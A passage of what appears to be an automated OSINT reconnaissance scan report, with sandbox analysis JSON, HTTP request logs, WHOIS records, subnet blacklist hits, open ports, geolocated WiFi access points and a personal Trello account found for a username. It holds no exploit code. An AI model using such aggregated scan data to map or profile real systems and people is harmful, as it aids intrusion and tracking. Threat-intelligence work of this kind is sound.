1\nConnection: Keep-Alive\nHost: software.verapdf.org" (Indicator: "mozilla/5.0 (")\n "GET /dev/verapdf_windows-x64_1_18-rc.exe HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nDNT: 1\nConnection: Keep-Alive\nHost: software.verapdf.org" (Indicator: "user-agent: ")\n "GET /wp-content/themes/veraPDF-site/includes/js/ie10-viewport-bug-workaround.js?ver=4.5.3 HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nDNT: 1\nConnection: Keep-Alive\nHost: staging.verapdf.org" (Indicator: "mozilla/5.0 (")\n "GET /wp-content/themes/veraPDF-site/includes/js/ie10-viewport-bug-workaround.js?ver=4.5.3 HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nDNT: 1\nConnection: Keep-Alive\nHost: staging.verapdf.org" (Indicator: "user-agent: ")\n "GET /wp-content/themes/veraPDF-site/includes/js/bootstrap-wp.js?ver=1.11.3 HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nDNT: 1\nConnection: Keep-Alive\nHost: staging.verapdf.org" (Indicator: "mozilla/5.0 (")\n "GET /wp-content/themes/veraPDF-site/includes/js/bootstrap-wp.js?ver=1.11.3 HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nDNT: 1\nConnection: Keep-Alive\nHost: staging.verapdf.org" (Indicator: "user-agent: ")\n "GET /bootstrap/3.3.6/js/bootstrap.min.js HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nReferer: 
https://software.verapdf.org/dev/verapdf_windows-x64_1_18-rc.exe\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: maxcdn.bootstrapcdn.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /bootstrap/3.3.6/js/bootstrap.min.js HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nReferer: https://software.verapdf.org/dev/verapdf_windows-x64_1_18-rc.exe\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: maxcdn.bootstrapcdn.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /bootstrap/3.3.6/css/bootstrap-theme.min.css HTTP/1.1\nAccept: text/css, */*\nReferer: https://software.verapdf.org/dev/verapdf_windows-x64_1_18-rc.exe\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: maxcdn.bootstrapcdn.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /bootstrap/3.3.6/css/bootstrap-theme.min.css HTTP/1.1\nAccept: text/css, */*\nReferer: https://software.verapdf.org/dev/verapdf_windows-x64_1_18-rc.exe\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: maxcdn.bootstrapcdn.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /bootstrap/3.3.6/css/bootstrap.min.css HTTP/1.1\nAccept: text/css, */*\nReferer: https://software.verapdf.org/dev/verapdf_windows-x64_1_18-rc.exe\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: maxcdn.bootstrapcdn.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /bootstrap/3.3.6/css/bootstrap.min.css HTTP/1.1\nAccept: text/css, */*\nReferer: https://software.verapdf.org/dev/verapdf_windows-x64_1_18-rc.exe\nAccept-Language: 
en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: maxcdn.bootstrapcdn.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /releases/v5.0.9/js/all.js HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nReferer: https://software.verapdf.org/dev/verapdf_windows-x64_1_18-rc.exe\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: use.fontawesome.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /releases/v5.0.9/js/all.js HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nReferer: https://software.verapdf.org/dev/verapdf_windows-x64_1_18-rc.exe\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: use.fontawesome.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /assets/css/style.css?ver=4.5.3 HTTP/1.1\nAccept: text/css, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nDNT: 1\nConnection: Keep-Alive\nHost: docs.verapdf.org" (Indicator: "mozilla/5.0 (")\n "GET /assets/css/style.css?ver=4.5.3 HTTP/1.1\nAccept: text/css, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nDNT: 1\nConnection: Keep-Alive\nHost: docs.verapdf.org" (Indicator: "user-agent: ")\n "GET /ajax/libs/jquery/1.11.3/jquery.min.js?ver=1.11.3 HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nReferer: https://software.verapdf.org/dev/verapdf_windows-x64_1_18-rc.exe\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: ajax.googleapis.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET 
/ajax/libs/jquery/1.11.3/jquery.min.js?ver=1.11.3 HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nReferer: https://software.verapdf.org/dev/verapdf_windows-x64_1_18-rc.exe\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: ajax.googleapis.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'ide | 185.199.111.153 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 4 | 0 | None | x-proxy-cache: MISS | {"content-length": "103646", "via": "1.1 varnish", "vary": "Accept-Encoding", "etag": "W/\"642b434c-63a06\"", "x-cache-hits": "0", "cache-control": "max-age=600", "x-served-by": "cache-ewr18167-EWR", "x-cache": "MISS", "x-github-request-id": "70D2:0CB6:1A723F4:28AE86F:645DAA55", "accept-ranges": "bytes", "expires": "Fri, 12 May 2023 03:04:13 GMT", "last-modified": "Mon, 03 Apr 2023 21:21:16 GMT", "x-fastly-request-id": "4232179a2468cad7d8e788f0a4fe958396bfc091", "date": "Fri, 12 May 2023 02:54:13 GMT", "access-control-allow-origin": "*", "x-proxy-cache": "MISS", "content-encoding": "gzip", "age": "0", "x-timer": "S1683860053.050131,VS0,VE21", "server": "GitHub.com", "connection": "keep-alive", "content-type": "application/javascript; charset=utf-8"} |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | <no ssid> (Net ID: 00:06:25:BA:AB:53) | 33.336199,-111.89446440830702 |
| 2023-05-12 03:01:20 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.181): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | MatrixEx Guest (Net ID: 00:01:21:26:34:40) | 41.8781, -87.6298 |
| 2023-05-12 02:44:29 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | githubusercontent.com | githubusercontent.com |
| 2023-05-12 03:00:53 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.82): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:18:41 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 185.199.109.133:443 | 185.199.109.0/24 |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | beeline1 (Net ID: 00:01:38:A8:7B:F3) | 34.0544, -118.244 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | Allstate 2.4G (Net ID: 00:02:6F:F8:0A:40) | 33.6170672,-111.90564645297056 |
| 2023-05-12 03:13:05 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [0031.github.io]
https://www.openphish.com/feed.txt | 0031.github.io |
| 2023-05-12 03:17:33 | Similar Domain - Whois | No | Whois | 1 | 0 | 2 | 0 | None | Domain Name: AIHU.XYZ
Registry Domain ID: D351663834-CNIC
Registrar WHOIS Server: whois.resellercamp.com
Registrar URL: https://idwebhost.com
Updated Date: 2023-03-07T15:29:15.0Z
Creation Date: 2023-03-02T11:39:51.0Z
Registry Expiry Date: 2024-03-02T23:59:59.0Z
Registrar: CV Jogjacamp
Registrar IANA ID: 1478
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registrant Organization: FENG SHENG FEI XING
Registrant State/Province: Jiangsu
Registrant Country: CN
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: NS1.DAN.COM
Name Server: NS2.DAN.COM
Name Server: VERIFICATION-EE5FF475.NS3.DAN.HOSTING
DNSSEC: unsigned
Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registrar Abuse Contact Email: abuse@resellercamp.com
Registrar Abuse Contact Phone: +62.82141570000
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T03:17:32.0Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
>>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit
https://www.centralnic.com/support/rdap <<<
The Whois and RDAP services are provided by CentralNic, and contain
information pertaining to Internet domain names registered by our
our customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com)
Access to the Whois and RDAP services is rate limited. For more
information, visit https://registrar-console.centralnic.com/pub/whois_guidance.
Domain Name: AIHU.XYZ
Registry Domain ID: D351663834-CNIC
Registrar WHOIS Server: whois.resellercamp.com
Registrar URL: http://resellercamp.com/
Updated Date: 2023-03-02T11:40:08Z
Creation Date: 2023-03-02T11:39:51Z
Registrar Registration Expiration Date: 2024-03-02T23:59:59Z
Registrar: CV. Jogjacamp
Registrar IANA ID: 1478
Registrar Abuse Contact Email: abuse@resellercamp.com
Registrar Abuse Contact Phone: +62.82141570000
Domain Status: clientTransferProhibited (http://icann.org/epp#clientTransferProhibited)
Registrant Organization: FENG SHENG FEI XING
Registrant State/Province: Jiangsu
Registrant Country: CN
Name Server: ns1.dan.com
Name Server: ns2.dan.com
Name Server: verification-ee5ff475.ns3.dan.hosting
DNSSEC: Unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>>Last update of WHOIS database: 2023-05-12T03:02:33Z<<<
For more information on Whois status codes, please visit https://icann.org/epp
Registration Service Provided By: PREMIUMDOMAINSELLER
The data in this whois database is provided to you for information purposes
only, that is, to assist you in obtaining information about or related to a
domain name registration record. We make this information available "as is",
and do not guarantee its accuracy. By submitting a whois query, you agree
that you will use this data only for lawful purposes and that, under no
circumstances will you use this data to:
(1) enable high volume, automated, electronic processes that stress or load
this whois database system providing you this information; or
(2) allow, enable, or otherwise support the transmission of mass unsolicited,
commercial advertising or solicitations via direct mail, electronic mail, or
by telephone.
The compilation, repackaging, dissemination or other use of this data is
expressly prohibited without prior written consent from us. The Registrar of
record is CV. Jogjacamp.
We reserve the right to modify these terms at any time.
By submitting this query, you agree to abide by these terms.
| aihu.xyz |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 4 | 0 | None | cf-ray: 7c5f6036af1541db-EWR | {"x-content-type-options": "nosniff", "content-encoding": "gzip", "transfer-encoding": "chunked", "expires": "Fri, 12 May 2023 04:54:13 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "last-modified": "Fri, 28 Apr 2023 14:11:18 GMT", "connection": "keep-alive", "etag": "W/\"644bd406-19c8\"", "cache-control": "max-age=7200, public", "date": "Fri, 12 May 2023 02:54:13 GMT", "cf-ray": "7c5f6036af1541db-EWR", "content-type": "text/css", "x-frame-options": "DENY"} |
| 2023-05-12 02:46:49 | Open TCP Port | No | SSL Certificate Analyzer | 0 | 0 | 3 | 0 | None | 104.196.30.220:443 | 104.196.30.220 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | prr (Net ID: 00:0C:41:CA:76:65) | 39.0469, -77.4903 |
| 2023-05-12 02:59:44 | Co-Hosted Site - Domain Whois | No | Whois | 1 | 0 | 2 | 0 | None | Domain Name: GITHUB.COM
Registry Domain ID: 1264983250_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.markmonitor.com
Registrar URL: http://www.markmonitor.com
Updated Date: 2022-09-07T09:10:44Z
Creation Date: 2007-10-09T18:20:50Z
Registry Expiry Date: 2024-10-09T18:20:50Z
Registrar: MarkMonitor Inc.
Registrar IANA ID: 292
Registrar Abuse Contact Email: abusecomplaints@markmonitor.com
Registrar Abuse Contact Phone: +1.2086851750
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Name Server: DNS1.P08.NSONE.NET
Name Server: DNS2.P08.NSONE.NET
Name Server: DNS3.P08.NSONE.NET
Name Server: DNS4.P08.NSONE.NET
Name Server: NS-1283.AWSDNS-32.ORG
Name Server: NS-1707.AWSDNS-21.CO.UK
Name Server: NS-421.AWSDNS-52.COM
Name Server: NS-520.AWSDNS-01.NET
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2023-05-12T02:59:31Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.
TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.
The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
| github.com |
| 2023-05-12 02:49:59 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 120, u'major_os_version': None, u'submit_name': u'https://www.bloknmesh.com/de-de/categories/temporary-fencing', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"109.237.26.201:443"\n "142.250.189.170:443"\n "185.199.110.153:443"\n "142.251.46.232:443"\n "142.250.191.78:443"\n "142.251.2.157:443"\n "142.251.46.226:443"\n "142.251.32.46:443"\n "142.251.46.227:443"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "gb_1_.svg" as clean (type is "SVG Scalable Vector Graphics image")\n Antivirus vendors marked dropped file "Tar3638.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar3599.tmp" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': 
u'"flagicons.lipis.dev"\n "www.bloknmesh.com"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3440"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_d70_IE_EarlyTabStart_0xd40_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_d70_ConnHashTable<3440>_HashTable_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_d70_IESQMMUTEX_0_303"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_d70_IESQMMUTEX_0_331"\n "\\Sessions\\1\\BaseNamedObjects\\{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\InternetShortcutMutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\VERMGMTBlockListFileMutex"\n "IsoScope_d70_IESQMMUTEX_0_331"\n "IsoScope_d70_IE_EarlyTabStart_0xd40_Mutex"\n "IsoScope_d70_ConnHashTable<3440>_HashTable_Mutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"Cab3637.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" 
number 1 6 datablocks 0x1 compression"\n "Cab3598.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "Cab383E.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"hire-green_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "search-white_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "logo_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "rapid-green_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "arrow-down-white_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "search_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "search-toggle-close_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "angle-right-small-white_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "angle-left-small-white_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "be_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "at_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "linkedin_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "twitter_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "facebook_2_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "footer-logo_1_.svg" 
has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "installation-green_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "logo-mobile_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "youtube_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "country-select-arrow_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://www.bloknmesh.com/de-de/categories/temporary-fencing"\n Pattern match: "https://www.bloknmesh.com"\n Pattern match: "www.bloknmesh.com"'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-6', u'name': u'Contacts Random Domain Names', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 0, u'type': 7, u'description': u'"www.bloknmesh.com" seems to be random'}], u'threat_level': 0, u'size': None, u'job_id': u'63eb580b7d33587f2f443f35', u'target_url': None, u'interesting': False, u'error_type': None, u'state': u'SUCCESS', u'entrypoint': None, u'mitre_attcks': [{u'parent': None, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'suspicious_identifiers': [], u'attck_id': u'T1105', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'Ingress Tool Transfer', u'informative_identifiers': [], u'tactic': u'Command and Control', u'informative_identifiers_count': 1, u'suspicious_identifiers_count': 0}, {u'parent': None, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'suspicious_identifiers': [], u'attck_id': u'T1071', u'malicious_identifiers': [], 
u'malicious_identifiers_count': 0, u'technique': u'Application Layer Protocol', u'informative_identifiers': [], u'tactic': u'Command and Control', u'informative_identifiers_count': 1, u'suspicious_identifiers_count': 0}, {u'parent': {u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'technique': u'Application Layer Protocol', u'attck_id': u'T1071'}, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'suspicious_identifiers': [], u'attck_id': u'T1071.004', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'DNS', u'informative_identifiers': [], u'tactic': u'Command and Control', u'informative_identifiers_count': 1, u'suspicious_identifiers_count': 0}], u'certificates': [], u'hosts': [u'109.237.26.201', u'142.250.189.170', u'185.199.110.153', u'142.251.46.232', u'142.250.191.78', u'142.251.2.157', u'142.251.46.226', u'142.251.32.46', u'142.251.46.227'], u'sha256': u'98228ff90c9f8d437b7717a175c4c0a4634b8aa926c865d3f9a93f694d5fffb2', u'sha512': u'42484cfd73b15b501e843f45713f7d5f1f010ae634f38fdafc0dca634b6821dd06299ad0a07a0e443ec47ef23bf4d39bfc93311d395add81ff8abda276828da7', u'image_file_characteristics': [], u'submissions': [{u'url': u'https://www.bloknmesh.com/de-de/categories/temporary-fencing', u'submission_id': u'63eb580b7d33587f2f443f36', u'created_at': u'2023-02-14T09:44:43+00:00', u'filename': None}], u'analysis_start_time': u'2023-02-14T09:44:43+00:00', u'tags': [], u'imphash': u'Unknown', u'total_network_connections': 9, u'av_detect': 0, u'machine_learning_models': [], u'total_signatures': 8, u'image_base': None, u'error_origin': None, u'ssdeep': u'Unknown', u'entrypoint_section': None, u'md5': u'63008ab1a3067ef2a0dcdbf2ec36585f', u'network_mode': u'default', u'processes': [], u'sha1': u'2c9b2fd9468f38f8c453657c6a2c2e71f321798e', u'url_analysis': True, u'type': None, u'file_metadata': None, u'dll_characteristics': [], u'vx_family': None, u'environment_description': u'Windows 7 64 bit', u'verdict': 
u'no specific threat', u'minor_os_version': None, u'domains': [u'flagicons.lipis.dev', u'www.bloknmesh.com'], u'extracted_files': [], u'type_short': []}] | 185.199.110.153 |
| 2023-05-12 03:24:19 | Account on External Site | No | Account Finder | 0 | 0 | 8 | 0 | None | Trello (Category: social)
https://trello.com/baptistevauthey | baptistevauthey |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Power IT (Net ID: 00:00:00:05:55:55) | 41.8781, -87.6298 |
| 2023-05-12 03:01:43 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.221): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:06:25:A1:D8:0C) | 33.336199,-111.89446440830702 |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | DR.KASIM (Net ID: 00:12:CF:44:EA:8F) | 40.2024, 29.0398 |
| 2023-05-12 03:24:47 | Country | No | Country Name Extractor | 0 | 0 | 3 | 0 | None | United States | San Francisco, California, 94107, United States, North America |
| 2023-05-12 02:56:50 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | fluid.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:57:f8:5f:6c:a4:d7:b1:d8:61:78:13:80:db:41:a4:54:3d
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Nov 17 13:23:04 2022 GMT
Not After : Feb 15 13:23:03 2023 GMT
Subject: CN=fluid.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
